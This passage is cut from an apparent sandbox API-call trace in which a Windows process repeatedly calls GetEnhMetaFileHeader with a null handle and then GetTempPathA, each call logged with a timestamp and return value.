hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.449] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.450] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.451] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0099.452] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0099.472] 